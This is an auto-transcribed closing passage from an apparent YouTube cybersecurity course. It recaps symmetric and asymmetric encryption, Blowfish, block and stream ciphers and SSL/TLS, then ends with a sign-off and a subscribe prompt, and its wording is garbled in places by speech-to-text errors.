to identify what the algorithm is used for so whether it is a symmetric algorithm which means it uses the same key or a symmetric algorithm where it uses a public key to encrypt and a private key to decrypt or does the Blowfish algorithm is just one more algorithm which uses symmetric encryption to encrypt and decrypt data algorithms that we have seen are essay and others that we have discussed as well as the interview questions are concerned what we need to remember is which algorithms are symmetric which algorithms are asymmetric what do symmetric algorithms do and what do unsymmetric uh symmetric algorithms do and we also look at block ciphers and stream ciphers block size methods are utilized to encrypt data that is stored stationary data retype rest and stream ciphers are utilized for data in motion while they are being streamed so SSL and TLS is another algorithm that comes into the picture when you're looking at streaming data so that wraps up our full course on cyber security for 2023. we hope you had a lot to learn and will be on the lookout for any suggestions or doubts in the comments section below so if you have any queries you know what to do thank you so much for tuning in today and happy learning [Music] hi there if you like this video subscribe to the simply learned YouTube channel and click here to watch similar videos turn it up and get certified click here